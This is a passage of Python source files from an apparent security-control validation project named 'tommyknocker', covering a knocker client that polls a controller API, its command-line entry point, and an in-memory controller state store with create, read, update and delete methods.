def __init__(self, controller, port, identity) -> None:
self.url = f"http://{controller}:{port}/api/v1/"
self.logger = getLogger("v1ControllerAPIInteractor")
self.logger.debug(f"Initialized v1 controller API interactor with URL: {self.url}")
self.identity = identity
def send_post_request(self, endpoint: str, data: Dict = {}) -> requests.Response:
self.logger.debug(f"Sending POST request to {endpoint} with data: {data}")
response = requests.post(f"{self.url}{endpoint}", json=data)
self.logger.debug(f"Received response from {endpoint}: [{response.status_code}] {response.text}")
return response
def send_get_request(self, endpoint: str) -> requests.Response:
self.logger.debug(f"Sending GET request to {endpoint}")
response = requests.get(f"{self.url}{endpoint}")
self.logger.debug(f"Received response from {endpoint}: [{response.status_code}] {response.text}")
return response
def send_put_request(self, endpoint: str, data: Dict) -> requests.Response:
self.logger.debug(f"Sending PUT request to {endpoint} with data: {data}")
response = requests.put(f"{self.url}{endpoint}", json=data)
self.logger.debug(f"Received response from {endpoint}: [{response.status_code}] {response.text}")
return response
def checkin(self) -> List[Test]:
self.logger.info(f"Checking in with controller")
response = self.send_post_request(f"knockers/{self.identity}/checkin", {})
if response.status_code != 200:
self.logger.error(f"Failed to check in with controller: [{response.status_code}] {response.text}")
return []
else:
self.logger.debug(f"Successfully checked in with controller")
return [Test(**test) for test in response.json()]
def get_test_by_id(self, test_id: UUID) -> Test:
self.logger.info(f"Getting test by ID {test_id}")
response = self.send_get_request(f"tests/{test_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get test by ID {test_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got test by ID {test_id}")
return Test(**response.json())
## TODO: Optimize as server-side method
def get_test_config_by_test_id(self, test_id: UUID) -> TestConfiguration:
self.logger.info(f"Getting test configuration for test ID {test_id}")
test = self.get_test_by_id(test_id)
if not test:
self.logger.error(f"Failed to get test ID {test_id}")
return None
else:
test_config = self.get_test_config_by_id(test.configuration_id)
self.logger.debug(f"Successfully got test configuration for test ID {test_id}")
return test_config
def get_test_config_by_id(self, config_id: UUID) -> TestConfiguration:
self.logger.info(f"Getting test configuration for test ID {config_id}")
response = self.send_get_request(f"test-configurations/{config_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get test configuration for test ID {config_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got test configuration for test ID {config_id}")
return TestConfiguration(**response.json())
def get_knock_by_id(self, knock_id: UUID) -> Knock:
self.logger.info(f"Getting knock by ID {knock_id}")
response = self.send_get_request(f"knocks/{knock_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get knock by ID {knock_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got knock by ID {knock_id}")
return Knock(**response.json())
def get_runner_by_id(self, runner_id: UUID) -> Runner:
self.logger.info(f"Getting runner by ID {runner_id}")
response = self.send_get_request(f"runners/{runner_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get runner by ID {runner_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got runner by ID {runner_id}")
return Runner(**response.json())
def get_test_component_status_by_id(self, status_id: UUID) -> TestComponentStatus:
self.logger.info(f"Getting test component status by ID {status_id}")
response = self.send_get_request(f"test-component-statuses/{status_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get test component status by ID {status_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got test component status by ID {status_id}")
return TestComponentStatus(**response.json())
def create_new_test_component_status(self, component_id: UUID, component_type: str, status: TestStatus) -> TestComponentStatus:
self.logger.info(f"Creating new test component status for component ID {component_id}")
response = self.send_post_request(f"test-component-statuses", asdict(NewTestComponentStatus(component_id, component_type, status)))
if response.status_code != 200:
self.logger.error(f"Failed to create new test component status for component ID {component_id}: [{response.status_code}] {response.text}")
else:
self.logger.debug(f"Successfully created new test component status for component ID {component_id}")
return TestComponentStatus(**response.json())
def add_test_component_status_to_test(self, test_id: UUID, status_id: UUID):
self.logger.info(f"Adding test component status with ID {status_id} to test with ID {test_id}")
response = self.send_put_request(f"tests/{test_id}/add_component_status/{status_id}", data = {})
if response.status_code != 200:
self.logger.error(f"Failed to add test component status with ID {status_id} to test with ID {test_id}: [{response.status_code}] {response.text}")
else:
self.logger.debug(f"Successfully added test component status with ID {status_id} to test with ID {test_id}")
def update_test_component_status(self, status_id: UUID, status: TestStatus):
self.logger.info(f"Updating test component status with ID {status_id}")
response = self.send_put_request(f"test-component-statuses/{status_id}", {"status": status.status.value})
if response.status_code != 200:
self.logger.error(f"Failed to update test component status with ID {status_id}: [{response.status_code}] {response.text}")
else:
self.logger.debug(f"Successfully updated test component status with ID {status_id}")
def create_or_update_test_component_status(self, test_id: UUID, component_id: UUID, status: TestStatus):
self.logger.info(f"Creating or updating test component status for test ID {test_id} and component ID {component_id}")
test = self.get_test_by_id(test_id)
if not test:
self.logger.error(f"Failed Creating or updating test component status for test ID {test_id} and component ID {component_id}")
return
else:
for component_status_id in test.component_status_ids:
component_status = self.get_test_component_status_by_id(component_status_id)
if component_status.component_id == component_id:
self.update_test_component_status(component_status.id, UpdatedTestComponentStatus(status))
return
test_component_status = self.create_new_test_component_status(component_id, ComponentType.KNOCK, status)
self.add_test_component_status_to_test(test_id, test_component_status.id)
def get_result_by_id(self, result_id: UUID) -> Result:
self.logger.info(f"Getting result by ID {result_id}")
response = self.send_get_request(f"results/{result_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get result by ID {result_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got result by ID {result_id}")
return Result(**response.json())
def get_knock_expected_results(self, knock_id: UUID) -> List[Result]:
self.logger.info(f"Getting expected results for knock with ID {knock_id}")
knock = self.get_knock_by_id(knock_id)
expected_results = []
if knock is None:
self.logger.error(f"Failed to get knock by ID {knock_id}")
return []
for result_id in knock.result_ids:
response = self.get_result_by_id(result_id)
if response is None:
self.logger.error(f"Failed to get result by ID {result_id}")
return None
expected_results.append(response)
return expected_results
class KnockerService:
def __init__(self, config: KnockerConfig):
self.config = config
self.scheduler = sched.scheduler()
self.knocks: Dict[UUID, ActiveKnock] = {}
self.logger = getLogger("KnockerService")
self.logger.info("Initialized knocker service")
self.logger.debug(f"Config: {self.config}")
self._api_interactor = v1ControllerAPIInteractor(self.config.controller, self.config.port, self.config.identity)
def run(self):
self.logger.info("Running knocker service")
self.checkin()
self.scheduler.enter(self.config.interval, 1, self.progress_active_knocks)
self.scheduler.run()
def checkin(self):
self.logger.info("Checking in with controller")
try:
tests = self._api_interactor.checkin()
self.scheduler.enter(0, 1, self.update_active_state, (tests,))
except Exception as e:
self.logger.error(f"Failed to check in with controller: {e}")
finally:
self.logger.debug(f"Checkin successful. Scheduling next checkin in {self.config.interval} seconds")
self.scheduler.enter(self.config.interval, 1, self.checkin)
def update_active_state(self, tests: List[Test]):
for test in tests:
if test.status >= TestStatus.CHECKING:
self.logger.debug(f"Test with ID {test.id} done knocking. Cleaning up knocks")
cleanup_targets = []
for knock_test_id in self.knocks:
if knock_test_id.startswith(str(test.id)):
cleanup_targets.append(knock_test_id)
for target in cleanup_targets:
self.knocks.pop(target)
continue
configuration = self._api_interactor.get_test_config_by_id(test.configuration_id)
if configuration is None:
self.logger.error(f"Failed to get test configuration for test ID {test.id}")
continue
for knock_id in configuration.knock_ids:
knock_test_id = f'{test.id}.{knock_id}'
if knock_test_id not in self.knocks:
knock = self._api_interactor.get_knock_by_id(knock_id)
if knock is None:
self.logger.error(f"Failed to get knock by ID {knock_id}")
continue
runner = self._api_interactor.get_runner_by_id(knock.runner_id)
self.knocks[knock_test_id] = ActiveKnock(knock=knock, runner=runner, test=test)
self.logger.debug(f"Added test-knock with ID {knock_test_id} to active state")
def progress_active_knocks(self):
try:
for knock_id, knock in self.knocks.items():
if not knock.current_state.final:
self.logger.debug(f"Cycling knock with id {knock_id}")
knock.cycle()
self._api_interactor.create_or_update_test_component_status(knock.test.id, knock.knock.id, ComponentStatus.PENDING if knock.current_state in [ActiveKnock.pending, ActiveKnock.pulling] else ComponentStatus.RUNNING)
else:
self.logger.debug(f"Knock with ID {knock_id} is already complete")
self.scheduler.enter(0, 1, self.check_knock_results, (knock,))
finally:
self.scheduler.enter(self.config.interval, 1, self.progress_active_knocks)
def check_knock_results(self, knock:ActiveKnock):
self.logger.debug(f"Checking result for knock with ID {knock.knock.id}")
expected_results = self._api_interactor.get_knock_expected_results(knock.knock.id)
actual_results = [result.check_result(exit_code=knock.exit_code, output=knock.output) for result in expected_results]
if all(actual_results):
self._api_interactor.create_or_update_test_component_status(knock.test.id, knock.knock.id, ComponentStatus.SUCCESS)
else:
self._api_interactor.create_or_update_test_component_status(knock.test.id, knock.knock.id, ComponentStatus.FAILURE)
| 14,149 | Python | .py | 233 | 49.600858 | 233 | 0.65547 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,541 | main.py | loredous_tommyknocker/src/python/knocker/main.py | from argparse import ArgumentParser, Namespace
from logging import DEBUG, INFO, basicConfig, getLogger
import sys
from knocker.service import KnockerConfig, KnockerService
def parse_arguments(args) -> Namespace:
parser = ArgumentParser(description="Knocker service for the Tommyknocker control validation service")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging")
parser.add_argument("-c", "--controller", type=str, help="Hostname or IP address for the Tommyknocker controller API")
parser.add_argument("-p", "--port", type=int, help="Port for the Tommyknocker controller API", default=443)
parser.add_argument("-i", "--interval", type=int, help="Interval in seconds between checkins with the Tommyknocker controller API", default=10)
parser.add_argument("-I", "--identity", type=str, help="Identity token for this knocker from the Tommyknocker controller API")
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_arguments(sys.argv[1:])
basicConfig(level=DEBUG if args.verbose else INFO)
logger = getLogger("Main")
logger.info("Starting knocker service")
logger.debug(f"Config: {args}")
KnockerService(KnockerConfig(controller=args.controller, port=args.port, interval=args.interval, identity=args.identity)).run()
| 1,336 | Python | .py | 19 | 66.210526 | 147 | 0.750382 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,542 | state.py | loredous_tommyknocker/src/python/controller/state.py | from abc import ABC, abstractmethod
from datetime import datetime
from typing import Dict, List
from uuid import UUID
import asyncio
import pickle
from controller.settings import app_settings
from shared.models.objects import Knock, Knocker, Runner, Monitor, ResponseExpectation, Test, TestComponentStatus, TestConfiguration, TestSuite, Result, Response
import shared.models.apiobjects as APIOjbects
from controller.errors import DuplicateException, NotFoundException
from shared.models.enums import ResultType, TestStatus
class ControllerState(ABC):
#region Knocker Management
@abstractmethod
def list_knockers(self) -> List[Knocker]:
raise NotImplementedError
@abstractmethod
def get_knocker_by_id(self, id: UUID) -> Knocker:
raise NotImplementedError
@abstractmethod
def create_knocker(self, knocker: Knocker) -> Knocker:
raise NotImplementedError
@abstractmethod
def update_knocker(self, knocker: Knocker) -> Knocker:
raise NotImplementedError
@abstractmethod
def delete_knocker(self, id: UUID) -> None:
raise NotImplementedError
@abstractmethod
def knocker_checkin(self, id: UUID) -> None:
raise NotImplementedError
#endregion Knocker Management
#region Knock Management
@abstractmethod
def list_knocks(self) -> List[Knock]:
raise NotImplementedError
@abstractmethod
def get_knock_by_id(self, id: UUID) -> Knock:
raise NotImplementedError
@abstractmethod
def create_knock(self, knock: Knock) -> Knock:
raise NotImplementedError
@abstractmethod
def update_knock(self, knock: Knock) -> Knock:
raise NotImplementedError
@abstractmethod
def delete_knock(self, id: UUID) -> None:
raise NotImplementedError
#endregion Knock Management
#region Runner Management
@abstractmethod
def list_runners(self) -> List[Runner]:
raise NotImplementedError
@abstractmethod
def get_runner_by_id(self, id: UUID) -> Runner:
raise NotImplementedError
@abstractmethod
def create_runner(self, runner: Runner) -> Runner:
raise NotImplementedError
@abstractmethod
def update_runner(self, runner: Runner) -> Runner:
raise NotImplementedError
@abstractmethod
def delete_runner(self, id: UUID) -> None:
raise NotImplementedError
#endregion Runner Management
#region Result Management
@abstractmethod
def list_results(self) -> List[Result]:
raise NotImplementedError
@abstractmethod
def get_result_by_id(self, id: UUID) -> Result:
raise NotImplementedError
@abstractmethod
def create_result(self, result: Result) -> Result:
raise NotImplementedError
@abstractmethod
def update_result(self, result: Result) -> Result:
raise NotImplementedError
@abstractmethod
def delete_result(self, id: UUID) -> None:
raise NotImplementedError
#endregion Result Management
#region Monitor Management
@abstractmethod
def list_monitors(self) -> List[Monitor]:
raise NotImplementedError
@abstractmethod
def get_monitor_by_id(self, id: UUID) -> Monitor:
raise NotImplementedError
@abstractmethod
def create_monitor(self, monitor: Monitor) -> Monitor:
raise NotImplementedError
@abstractmethod
def update_monitor(self, monitor: Monitor) -> Monitor:
raise NotImplementedError
@abstractmethod
def delete_monitor(self, id: UUID) -> None:
raise NotImplementedError
#endregion Monitor Management
#region Response Management
@abstractmethod
def list_responses(self) -> List[Response]:
raise NotImplementedError
@abstractmethod
def get_response_by_id(self, id: UUID) -> Response:
raise NotImplementedError
@abstractmethod
def create_response(self, response: Response) -> Response:
raise NotImplementedError
@abstractmethod
def update_response(self, response: Response) -> Response:
raise NotImplementedError
@abstractmethod
def delete_response(self, id: UUID) -> None:
raise NotImplementedError
#endregion Response Management
#region ResponseExpectation Management
@abstractmethod
def list_response_expectations(self) -> List[ResponseExpectation]:
raise NotImplementedError
@abstractmethod
def get_response_expectation_by_id(self, id: UUID) -> ResponseExpectation:
raise NotImplementedError
@abstractmethod
def create_response_expectation(self, response_expectation: ResponseExpectation) -> ResponseExpectation:
raise NotImplementedError
@abstractmethod
def update_response_expectation(self, response_expectation: ResponseExpectation) -> ResponseExpectation:
raise NotImplementedError
@abstractmethod
def delete_response_expectation(self, id: UUID) -> None:
raise NotImplementedError
#endregion ResponseExpectation Management
#region TestConfiguration Management
@abstractmethod
def list_test_configurations(self) -> List[TestConfiguration]:
raise NotImplementedError
@abstractmethod
def get_test_configuration_by_id(self, id: UUID) -> TestConfiguration:
raise NotImplementedError
@abstractmethod
def create_test_configuration(self, test_configuration: TestConfiguration) -> TestConfiguration:
raise NotImplementedError
@abstractmethod
def update_test_configuration(self, test_configuration: TestConfiguration) -> TestConfiguration:
raise NotImplementedError
@abstractmethod
def delete_test_configuration(self, id: UUID) -> None:
raise NotImplementedError
#endregion TestConfiguration Management
#region TestComponentStatus Management
@abstractmethod
def list_test_component_statuses(self) -> List[TestComponentStatus]:
raise NotImplementedError
@abstractmethod
def get_test_component_status_by_id(self, id: UUID) -> TestComponentStatus:
raise NotImplementedError
@abstractmethod
def create_test_component_status(self, test_component_status: TestComponentStatus) -> TestComponentStatus:
raise NotImplementedError
@abstractmethod
def update_test_component_status(self, test_component_id: UUID, test_component_status: APIOjbects.UpdatedTestComponentStatus) -> TestComponentStatus:
raise NotImplementedError
@abstractmethod
def delete_test_component_status(self, id: UUID) -> None:
raise NotImplementedError
@abstractmethod
def get_test_component_status_by_component_id(self, component_id: UUID) -> TestComponentStatus:
raise NotImplementedError
#endregion TestComponentStatus Management
#region Test Management
@abstractmethod
def list_tests(self) -> List[Test]:
raise NotImplementedError
@abstractmethod
def get_test_by_id(self, id: UUID) -> Test:
raise NotImplementedError
@abstractmethod
def create_test(self, test: Test) -> Test:
raise NotImplementedError
@abstractmethod
def update_test(self, test: Test) -> Test:
raise NotImplementedError
@abstractmethod
def delete_test(self, id: UUID) -> None:
raise NotImplementedError
@abstractmethod
def add_test_component_status(self, test_id: UUID, component_status_id: UUID) -> None:
raise NotImplementedError
@abstractmethod
def get_tests_by_knocker_id(self, knocker_id: UUID) -> List[Test]:
raise NotImplementedError
#endregion Test Management
#region TestSuite Management
@abstractmethod
def list_test_suites(self) -> List[TestSuite]:
raise NotImplementedError
@abstractmethod
def get_test_suite_by_id(self, id: UUID) -> TestSuite:
raise NotImplementedError
@abstractmethod
def create_test_suite(self, test_suite: TestSuite) -> TestSuite:
raise NotImplementedError
@abstractmethod
def update_test_suite(self, test_suite: TestSuite) -> TestSuite:
raise NotImplementedError
@abstractmethod
def delete_test_suite(self, id: UUID) -> None:
raise NotImplementedError
#endregion TestSuite Management
class InMemoryState(ControllerState):
def __init__(self):
super().__init__()
self._knockers: Dict[UUID, Knocker] = {}
self._knocks: Dict[UUID, Knock] = {}
self._runners: Dict[UUID, Runner] = {}
self._results: Dict[UUID, Result] = {}
self._monitors: Dict[UUID, Monitor] = {}
self._responses: Dict[UUID, Response] = {}
self._response_expectations: Dict[UUID, ResponseExpectation] = {}
self._test_configurations: Dict[UUID, TestConfiguration] = {}
self._test_component_statuses: Dict[UUID, TestComponentStatus] = {}
self._tests: Dict[UUID, Test] = {}
self._test_suites: Dict[UUID, TestSuite] = {}
#region Knocker Management
def list_knockers(self) -> List[Knocker]:
return list(self._knockers.values())
def get_knocker_by_id(self, id: UUID) -> Knocker:
knocker = self._knockers.get(id,None)
if knocker:
return knocker
else:
raise NotFoundException(f"Knocker with id {id} not found")
def create_knocker(self, knocker: APIOjbects.NewKnocker) -> Knocker:
new_knocker = Knocker(**knocker.__dict__)
if new_knocker.id in self._knockers:
raise DuplicateException(f"Knocker with id {new_knocker.id} already exists")
else:
self._knockers[new_knocker.id] = new_knocker
return new_knocker
def update_knocker(self, id: UUID, knocker: APIOjbects.UpdatedKnocker) -> Knocker:
if id in self._knockers:
self._knockers[id].update(knocker)
return self._knockers[id]
else:
raise NotFoundException(f"Knocker with id {knocker.id} not found")
def delete_knocker(self, id: UUID) -> None:
if id in self._knockers:
self._knockers.pop(id)
else:
raise NotFoundException(f"Knocker with id {id} not found")
def knocker_checkin(self, id: UUID) -> None:
if id in self._knockers:
self._knockers[id].last_seen = datetime.now()
else:
raise NotFoundException(f"Knocker with id {id} not found")
#endregion Knocker Management
#region Knock Management
def validate_knock_relationships(self, knock: Knock) -> None:
for result_id in knock.result_ids:
if result_id not in self._results:
raise NotFoundException(f"Result with id {result_id} not found")
if knock.runner_id not in self._runners:
raise NotFoundException(f"Runner with id {knock.runner_id} not found")
def list_knocks(self) -> List[Knock]:
return list(self._knocks.values())
def get_knock_by_id(self, id: UUID) -> Knock:
knock = self._knocks.get(id,None)
if knock:
return knock
else:
raise NotFoundException(f"Knock with id {id} not found")
def create_knock(self, knock: APIOjbects.NewKnock) -> Knock:
new_knock = Knock(**knock.__dict__)
if new_knock.id in self._knocks:
raise DuplicateException(f"Knock with id {new_knock.id} already exists")
self.validate_knock_relationships(new_knock)
self._knocks[new_knock.id] = new_knock
return new_knock
def update_knock(self, id: UUID, knock: APIOjbects.UpdatedKnock) -> Knock:
if id in self._knocks:
updated = self._knocks[id].clone_with_updates(knock)
self.validate_knock_relationships(updated)
self._knocks[id] = updated
return self._knocks[id]
else:
raise NotFoundException(f"Knock with id {id} not found")
def delete_knock(self, id: UUID) -> None:
if id in self._knocks:
self._knocks.pop(id)
else:
raise NotFoundException(f"Knock with id {id} not found")
#endregion Knock Management
#region Runner Management
def list_runners(self) -> List[Runner]:
return list(self._runners.values())
def get_runner_by_id(self, id: UUID) -> Runner:
runner = self._runners.get(id, None)
if runner:
return runner
else:
raise NotFoundException(f"Runner with id {id} not found")
def create_runner(self, runner: APIOjbects.NewRunner) -> Runner:
new_runner = Runner(**runner.__dict__)
if new_runner.id in self._runners:
raise DuplicateException(f"Runner with id {new_runner.id} already exists")
self._runners[new_runner.id] = new_runner
return new_runner
def update_runner(self, id: UUID, runner: APIOjbects.UpdatedRunner) -> Runner:
if id in self._runners:
self._runners[id].update(runner)
return self._runners[id]
else:
raise NotFoundException(f"Runner with id {id} not found")
def delete_runner(self, id: UUID) -> None:
if id in self._runners:
self._runners.pop(id)
else:
raise NotFoundException(f"Runner with id {id} not found")
#endregion Runner Management
#region Result Management
def list_results(self) -> List[Result]:
return list(self._results.values())
def get_result_by_id(self, id: UUID) -> Result:
result = self._results.get(id, None)
if result:
return result
else:
raise NotFoundException(f"Result with id {id} not found")
def create_result(self, result: APIOjbects.NewResult) -> Result:
new_result = Result(**result.__dict__)
if new_result.id in self._results:
raise DuplicateException(f"Result with id {new_result.id} already exists")
self._results[new_result.id] = new_result
return new_result
def update_result(self, id: UUID, result: APIOjbects.UpdatedResult) -> Result:
if id in self._results:
self._results[id].update(result)
return self._results[id]
else:
raise NotFoundException(f"Result with id {id} not found")
def delete_result(self, id: UUID) -> None:
if id in self._results:
self._results.pop(id)
else:
raise NotFoundException(f"Result with id {id} not found")
#endregion Result Management
#region Monitor Management
def list_monitors(self) -> List[Monitor]:
return list(self._monitors.values())
def get_monitor_by_id(self, id: UUID) -> Monitor:
monitor = self._monitors.get(id, None)
if monitor:
return monitor
else:
raise NotFoundException(f"Monitor with id {id} not found")
def create_monitor(self, monitor: APIOjbects.NewMonitor) -> Monitor:
new_monitor = Monitor(**monitor.__dict__)
if new_monitor.id in self._monitors:
raise DuplicateException(f"Monitor with id {new_monitor.id} already exists")
self._monitors[new_monitor.id] = new_monitor
return new_monitor
def update_monitor(self, id: UUID, monitor: APIOjbects.UpdatedMonitor) -> Monitor:
if id in self._monitors:
self._monitors[id].update(monitor)
return self._monitors[id]
else:
raise NotFoundException(f"Monitor with id {id} not found")
def delete_monitor(self, id: UUID) -> None:
if id in self._monitors:
self._monitors.pop(id)
else:
raise NotFoundException(f"Monitor with id {id} not found")
#endregion Monitor Management
#region Response Management
def validate_response_relationships(self, response: Response) -> None:
if response.monitor_id not in self._monitors:
raise NotFoundException(f"Monitor with id {response.monitor_id} not found")
def list_responses(self) -> List[Response]:
return list(self._responses.values())
def get_response_by_id(self, id: UUID) -> Response:
response = self._responses.get(id, None)
if response:
return response
else:
raise NotFoundException(f"Response with id {id} not found")
def create_response(self, response: APIOjbects.NewResponse) -> Response:
new_response = Response(**response.__dict__)
if new_response.id in self._responses:
raise DuplicateException(f"Response with id {new_response.id} already exists")
self.validate_response_relationships(new_response)
self._responses[new_response.id] = new_response
return new_response
def update_response(self, id: UUID, response: APIOjbects.UpdatedResponse) -> Response:
if id in self._responses:
updated = self._responses[id].clone_with_updates(response)
self.validate_response_relationships(updated)
self._responses[id] = updated
return self._responses[id]
else:
raise NotFoundException(f"Response with id {response.id} not found")
def delete_response(self, id: UUID) -> None:
if id in self._responses:
self._responses.pop(id)
else:
raise NotFoundException(f"Response with id {id} not found")
#endregion Response Management
#region ResponseExpectation Management
def validate_response_expectation_relationships(self, response_expectation: ResponseExpectation) -> None:
if response_expectation.response_id not in self._responses:
raise NotFoundException(f"Response with id {response_expectation.response_id} not found")
def list_response_expectations(self) -> List[ResponseExpectation]:
return list(self._response_expectations.values())
def get_response_expectation_by_id(self, id: UUID) -> ResponseExpectation:
response_expectation = self._response_expectations.get(id, None)
if response_expectation:
return response_expectation
else:
raise NotFoundException(f"ResponseExpectation with id {id} not found")
def create_response_expectation(self, response_expectation: APIOjbects.NewResponseExpectation) -> ResponseExpectation:
new_response_expectation = ResponseExpectation(**response_expectation.__dict__)
if new_response_expectation.id in self._response_expectations:
raise DuplicateException(f"ResponseExpectation with id {new_response_expectation.id} already exists")
self.validate_response_expectation_relationships(new_response_expectation)
self._response_expectations[new_response_expectation.id] = new_response_expectation
return new_response_expectation
def update_response_expectation(self, id: UUID, response_expectation: APIOjbects.UpdatedResponseExpectation) -> ResponseExpectation:
if id in self._response_expectations:
updated = self._response_expectations[id].clone_with_updates(response_expectation)
self.validate_response_expectation_relationships(updated)
self._response_expectations[id] = updated
return self._response_expectations[id]
else:
raise NotFoundException(f"ResponseExpectation with id {id} not found")
def delete_response_expectation(self, id: UUID) -> None:
if id in self._response_expectations:
self._response_expectations.pop(id)
else:
raise NotFoundException(f"ResponseExpectation with id {id} not found")
#endregion ResponseExpectation Management
#region TestConfiguration Management
def validate_test_configuration_relationships(self, test_configuration: TestConfiguration) -> None:
for knock_id in test_configuration.knock_ids:
if knock_id not in self._knocks:
raise NotFoundException(f"Knock with id {knock_id} not found")
for response_expectation_id in test_configuration.response_expectation_ids:
if response_expectation_id not in self._response_expectations:
raise NotFoundException(f"ResponseExpectation with id {response_expectation_id} not found")
def list_test_configurations(self) -> List[TestConfiguration]:
return list(self._test_configurations.values())
def get_test_configuration_by_id(self, id: UUID) -> TestConfiguration:
test_configuration = self._test_configurations.get(id, None)
if test_configuration:
return test_configuration
else:
raise NotFoundException(f"TestConfiguration with id {id} not found")
def create_test_configuration(self, test_configuration: APIOjbects.NewTestConfiguration) -> TestConfiguration:
new_test_configuration = TestConfiguration(**test_configuration.__dict__)
if new_test_configuration.id in self._test_configurations:
raise DuplicateException(f"TestConfiguration with id {new_test_configuration.id} already exists")
self.validate_test_configuration_relationships(new_test_configuration)
self._test_configurations[new_test_configuration.id] = new_test_configuration
return new_test_configuration
def update_test_configuration(self, id: UUID, test_configuration: APIOjbects.UpdatedTestConfiguration) -> TestConfiguration:
if id in self._test_configurations:
updated = self._test_configurations[id].clone_with_updates(test_configuration)
self.validate_test_configuration_relationships(updated)
self._test_configurations[id] = updated
return self._test_configurations[id]
else:
raise NotFoundException(f"TestConfiguration with id {id} not found")
def delete_test_configuration(self, id: UUID) -> None:
if id in self._test_configurations:
self._test_configurations.pop(id)
else:
raise NotFoundException(f"TestConfiguration with id {id} not found")
def get_latest_runs_by_test_configuration_id(self, id: UUID, count: int):
tests = [test for test in self._tests.values() if test.configuration_id == id]
tests.sort(key=lambda x: x.ended, reverse=True)
if len(tests) > count:
return tests[:count]
else:
return tests
#endregion TestConfiguration Management
#region TestComponentStatus Management
def validate_test_component_status_relationships(self, test_component_status: TestComponentStatus) -> None:
if test_component_status.component_id not in self._knocks and test_component_status.component_id not in self._responses:
raise NotFoundException(f"Id {test_component_status.component_id} does not match any known Knocks or Responses")
def list_test_component_statuses(self) -> List[TestComponentStatus]:
return list(self._test_component_statuses.values())
def get_test_component_status_by_id(self, id: UUID) -> TestComponentStatus:
test_component_status = self._test_component_statuses.get(id, None)
if test_component_status:
return test_component_status
else:
raise NotFoundException(f"TestComponentStatus with id {id} not found")
def create_test_component_status(self, test_component_status: APIOjbects.NewTestComponentStatus) -> TestComponentStatus:
new_test_component_status = TestComponentStatus(**test_component_status.__dict__)
if new_test_component_status.id in self._test_component_statuses:
raise DuplicateException(f"TestComponentStatus with id {new_test_component_status.id} already exists")
new_test_component_status.updated = datetime.now()
self.validate_test_component_status_relationships(new_test_component_status)
self._test_component_statuses[new_test_component_status.id] = new_test_component_status
return new_test_component_status
def update_test_component_status(self, test_component_id: UUID, test_component_status: APIOjbects.UpdatedTestComponentStatus) -> TestComponentStatus:
if test_component_id in self._test_component_statuses:
self._test_component_statuses[test_component_id].status = test_component_status.status
self._test_component_statuses[test_component_id].updated = datetime.now()
return self._test_component_statuses[test_component_id]
else:
raise NotFoundException(f"TestComponentStatus with id {test_component_status.id} not found")
def delete_test_component_status(self, id: UUID) -> None:
if id in self._test_component_statuses:
self._test_component_statuses.pop(id)
else:
raise NotFoundException(f"TestComponentStatus with id {id} not found")
def get_test_component_status_by_component_id(self, component_id: UUID) -> TestComponentStatus:
for test_component_status in self._test_component_statuses.values():
if test_component_status.component_id == component_id:
return test_component_status
raise NotFoundException(f"TestComponentStatus with component_id {component_id} not found")
def get_test_component_statuses_by_test_id(self, test_id: UUID) -> List[TestComponentStatus]:
test = self.get_test_by_id(test_id)
return [self._test_component_statuses[component_status_id] for component_status_id in test.component_status_ids]
#endregion TestComponentStatus Management
#region Test Management
def validate_test_relationships(self, test: Test) -> None:
if test.configuration_id not in self._test_configurations:
raise NotFoundException(f"TestConfiguration with id {test.configuration_id} not found")
if test.knocker_id not in self._knockers:
raise NotFoundException(f"Knocker with id {test.knocker_id} not found")
for component_status_id in test.component_status_ids:
if component_status_id not in self._test_component_statuses:
raise NotFoundException(f"TestComponentStatus with id {component_status_id} not found")
def list_tests(self) -> List[Test]:
return list(self._tests.values())
def get_test_by_id(self, id: UUID) -> Test:
test = self._tests.get(id, None)
if test:
return test
else:
raise NotFoundException(f"Test with id {id} not found")
def create_test(self, test: APIOjbects.NewTest) -> Test:
new_test = Test(**test.__dict__)
if new_test.id in self._tests:
raise DuplicateException(f"Test with id {new_test.id} already exists")
self.validate_test_relationships(new_test)
self._tests[new_test.id] = new_test
return new_test
def update_test(self, id: UUID, test: APIOjbects.UpdatedTest) -> Test:
if id in self._tests:
updated = self._tests[id].clone_with_updates(test)
self.validate_test_relationships(updated)
self._tests[id] = updated
return self._tests[id]
else:
raise NotFoundException(f"Test with id {id} not found")
def delete_test(self, id: UUID) -> None:
if id in self._tests:
self._tests.pop(id)
else:
raise NotFoundException(f"Test with id {id} not found")
def get_tests_by_knocker_id(self, knocker_id: UUID) -> List[Test]:
return [test for test in self._tests.values() if test.knocker_id == knocker_id]
def add_test_component_status(self, test_id: UUID, component_status_id: UUID) -> None:
if test_id in self._tests:
self._tests[test_id].component_status_ids.append(component_status_id)
return self._tests[test_id]
else:
raise NotFoundException(f"Test with id {test_id} not found")
def get_tests_by_status(self, status: TestStatus) -> List[Test]:
return [test for test in self._tests.values() if test.status == status]
def get_running_tests(self) -> List[Test]:
return [test for test in self._tests.values() if test.status in (TestStatus.KNOCKING, TestStatus.CHECKING)]
def get_completed_tests(self) -> List[Test]:
return [test for test in self._tests.values() if test.status in (TestStatus.SUCCESS, TestStatus.FAILURE, TestStatus.ERROR)]
#endregion Test Management
#region TestSuite Management
def validate_test_suite_relationships(self, test_suite: TestSuite) -> None:
for test_configuration_id in test_suite.test_configuration_ids:
if test_configuration_id not in self._test_configurations:
raise NotFoundException(f"TestConfiguration with id {test_configuration_id} not found")
def list_test_suites(self) -> List[TestSuite]:
return list(self._test_suites.values())
def get_test_suite_by_id(self, id: UUID) -> TestSuite:
test_suite = self._test_suites.get(id, None)
if test_suite:
return test_suite
else:
